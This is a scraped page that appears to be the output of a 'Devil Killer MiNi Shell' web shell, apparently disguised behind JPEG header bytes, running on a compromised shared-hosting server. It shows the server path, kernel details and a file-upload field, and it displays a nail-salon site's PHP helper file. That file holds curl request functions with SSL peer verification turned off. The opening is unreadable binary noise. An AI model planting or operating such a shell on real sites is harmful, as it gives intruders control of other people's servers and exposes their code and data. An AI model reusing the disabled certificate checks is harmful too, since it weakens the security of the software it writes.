JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /hermes/bosnacweb04/bosnacweb04ac/b1072/ipg.liuyuan7592410/wb_sms.nailclub.ca/lib/php/

Linux boscustweb5005.eigbox.net 5.4.91 #1 SMP Wed Jan 20 18:10:28 EST 2021 x86_64
Upload File :
Current File : /hermes/bosnacweb04/bosnacweb04ac/b1072/ipg.liuyuan7592410/wb_sms.nailclub.ca/lib/php/my_php_tools.php

<?PHP
/**
 * PHP一些常用工具 
 * version = debug 0.1 2018/11/22
 * version = debug 0.2.001 2020/4/13 增加了phpUpperDir($dir)
 * 			 writelog()函数增加记录调用者信息。
 * 			 增加endRunning()函数
 * 			 debug 0.2.002 2020/4/15 增加getHttpHead()函数,获取http头消息。
 */

/**
 * 随机生成指定长度的字符串,由数字和大小写字母组成,如果初始字符串不是NULL,
 * 会根据提供的初始字符串的长度,及要求的随机字符串长度,生成一个长度为$str_length的字符串。第一个字符是
 * 初始字符串的第一个字符,第二个字符是生成字符串的第一个字符,如此交错,最后较长的一个字符串补齐最后的空缺
 * @param  integer $str_length [description]
 * @param  string $str_ini 给一个初始字符串
 * @return [string]              [description]
 */
date_default_timezone_set('EST5EDT');

/** 判断指定年份是否是闰年,如果是,返回true,不是,返回false */
function leapYr($year){
	$time = mktime(20,20,20,4,20,$year);//取得一个日期的 Unix 时间戳;
	return (date("L",$time)==1)?true:false;
}

function rand_str($str_length=8,$str_ini=NULL){
	$rand_str = '';
	if($str_ini==NULL)
	{
		if ($str_length<1)
			return $rand_str;
		for ($i = 0; $i < $str_length; $i++){
			$rand_index = mt_rand(0,2);
			switch ($rand_index){
				case 0:
					$rand_str .= chr(mt_rand(48, 57)); //0-9字符
				break;
				case 1:
					$rand_str .= chr(mt_rand(65, 90));  //A-Z字母
				break;
				case 2:
					$rand_str .= chr(mt_rand(97, 122));	 //a-z字母
				break;
			}
		}
	} elseif($str_length<=strlen($str_ini)) {
		$rand_str=substr($str_ini,0,$str_length);
	} else {
		$rand_str=mix_str($str_ini,rand_str($str_length-strlen($str_ini)));
	}

	return $rand_str;
}

/**
 * 把两个字符串按照正相交叉混合,较长字符串多出部分补在后面,从$str1的首个字符开始混装。
 * @param  [type] $str1 [description]
 * @param  [type] $str2 [description]
 * @return [type]       [description]
 */
function mix_str($str1,$str2){
	$str1_length=strlen($str1);
	$str2_length=strlen($str2);
	$str="";

	$str_length=($str1_length>=$str2_length)?$str2_length:$str1_length;
	$str_tail=($str1_length>=$str2_length)?
				substr($str1,$str2_length,$str1_length-$str2_length):
				substr($str2,$str1_length,$str2_length-$str1_length);

	for($i=0;$i<$str_length;$i++){
		$str.=substr($str1,$i,1).substr($str2,$i,1);
	}
	$str.=$str_tail;

	return $str;
}

/**
 * 随机生成指定位数的数
 * @param  integer $digits_length [位数,缺省是8位]
 * @return string                 [description]
 */
function rand_digits($digits_length=8){
	if ($digits_length<1)
		return "";
	$rand_num=chr(mt_rand(49, 57));
	for ($i=1;$i<$digits_length;$i++){
		$rand_num .= chr(mt_rand(48, 57));
	}
	return $rand_num;
}

/**
 * 发送POST请求的方法
 * @param  [type]  $url  [description]
 * @param  [type]  $data [description]
 * @param  boolean $ssl  [缺省是发https请求]
 * @return [type]        [description]
 */
function requestPost($url,$data,$ssl=true){
	//curl 完成
	$curl=curl_init();

	//设置curl选项
	curl_setopt($curl,CURLOPT_URL,$url);//URL

	//user_agent,请求代理信息
	$user_agent=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36';
	curl_setopt($curl,CURLOPT_USERAGENT,$user_agent);

	//referer头,请求来源
	curl_setopt($curl,CURLOPT_AUTOREFERER,true);
	curl_setopt($curl,CURLOPT_TIMEOUT,20); //设置超时时间

	//SSL相关
	if($ssl){
		curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,false); //终止从服务器端进行验证
		curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,2);//检查服务器SSL证书中是否存在一个公用名(common name)
	}
	//处理post相关选项
	curl_setopt($curl,CURLOPT_POST,true);  //是否为post请求
	curl_setopt($curl,CURLOPT_POSTFIELDS,$data); //数据处理
	//响应数据
	curl_setopt($curl,CURLOPT_HEADER,false); //是否处理响应头
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);//curl_exec()是否返回响应结果

	//发出请求
	$response=curl_exec($curl);
	if(false === $response){
		/*echo '<br>',curl_error($curl),'<br>';*/
		return false;
	}
	return $response;
}

/**
 *发送GET请求的方法
 *@param string $url URL
 *@param bool $ssl 是否为https协议
 *@param book $header 返回是否包含http头。
 *@return 如果定义返回头,这个返回值类型是字符串数组,下标分别为"header"携带http头信息,和"body"携带http内容信息。
 *        如果定义不返回头,这个返回值类型是字符串,响应主体Content,不包括http头
 */
function requestGet($url,$ssl=true,$header=false){
	//curl 完成
	$curl=curl_init();

	//设置curl选项
	curl_setopt($curl,CURLOPT_URL,$url);//URL

	//user_agent,请求代理信息
	$user_agent=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36';
	curl_setopt($curl,CURLOPT_USERAGENT,$user_agent);

	//referer头,请求来源
	curl_setopt($curl,CURLOPT_AUTOREFERER,true);

	//SSL相关
	if($ssl){
		curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,false); //终止从服务器端进行验证
		curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,2);//检查服务器SSL证书中是否存在一个公用名(common name)
	}

	//响应数据
	curl_setopt($curl,CURLOPT_HEADER,$header); //是否处理(返回)响应头,缺省是不处理
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);//curl_exec()是否返回响应结果

	//发出请求
	$result=curl_exec($curl);
	if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '200') {
		if ($header){
			$headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
			$response=array(
						"header" => substr($result, 0, $headerSize),
						"body" => substr($result, $headerSize));
			return $response;
		} else {
			return $result;
		}
	} else {
//		echo '<br>',curl_error($curl),'<br>';
		return false;
	}

	return false;

}

/**
 * 记录日志 格式为 时间 ==> 内容
 * @param  [type] $log_file    [指定日志文件名]
 * @param  [type] $log_content [日志内容]
 * @return [type]          [description]
 */
function writeLog($log_file,$log_content){
	$dbt=debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS,10);
	$numLayer = count($dbt);
	$caller = null;
	for ($i=1;$i<$numLayer;$i++){
		$caller .="\n    ";
		$caller .= isset($dbt[$i]['class'])?($dbt[$i]['class']."->"):"";
	 	$caller .= isset($dbt[$i]['function'])? ($dbt[$i]['function']) : "";	
	 	$caller .= " [line]=".(isset($dbt[$i]['line'])?$dbt[$i]['line']:"");	
	}
 	$log_content .= "\n  caller info:".$caller;
	file_put_contents($log_file,date('Y-m-d H:i:s',time())."==>  ".$log_content.PHP_EOL,FILE_APPEND);
}


function endRunning($code,$errMsg){
	global $running_log_file;
	writelog($running_log_file,$errMsg);
	die("{\"code\":\"".$code."\",\"result\":\"failed\",\"err\":\"".$errMsg."\"}");
}

function phpUpperDir($dir){
	return substr($dir,0,strrpos($dir,"\\",0));
}

/** 
 * 将传入的日期做一个格式调整,为了创建查询语句方便
 * @param  [type] $str_date [description]
 * @return [type]           [description]
 */
function adjustDateFmt($str_date,$separator=""){
	$str_date=date("Y".$separator."m".$separator."d",strtotime($str_date));
	return $str_date;
}

function time24to12($time_24){
	return date("h:ia",strtotime("2000-1-1 ".$time_24));
}

function time12to24($time_12){
	return date("H:ia",strtotime("2000-1-1 ".$time_12));
}

/**
 * 从$_SERVER中提取http相关的数据,重新放在数组中返回,
 * 输入参数是每条记录的分隔符,例如可以使用\n,标识分行。
 * 输入参数缺省时,返回数组是字符串下标,下标就是http头参数名。
 * @return [type] [description]
 */
function getHttpHead($type="array"){
    // 忽略获取的header数据。这个函数后面会用到。主要是起过滤作用
    // $ignore = array('host','accept','content-length','content-type');

	$ignore = array();
	$mandatory = array("CONTENT_TYPE");
    if($type == "array"){
		$headers = array();
    }else{
    	$headers = "";
    }

    foreach($_SERVER as $key=>$value){
    	if((substr($key, 0, 5)==='HTTP_')||(in_array($key,$mandatory))){
			if(substr($key, 0, 5)==='HTTP_'){
				//这里取到的都是'http_'开头的数据。
				////前去开头的前5位
				$key = substr($key, 5);
				//把$key中的'_'下划线都替换为空字符串
				$key = str_replace('_', ' ', $key);
				//再把$key中的空字符串替换成‘-’
				$key = str_replace(' ', '-', $key);
			}
			//把$key中的所有字符转换为小写
			$key = strtolower($key);

			//这里主要是过滤上面写的$ignore数组中的数据
			if(!in_array($key, $ignore)){
				if($type == "array"){
					$headers[$key] = $value;
				}else{
					$headers .= $key." : ".$value.$type;
				}
			}
    	}
    }
	//输出获取到的header
    return $headers;
}
?>

Creat By MiNi SheLL
Email: devilkiller@gmail.com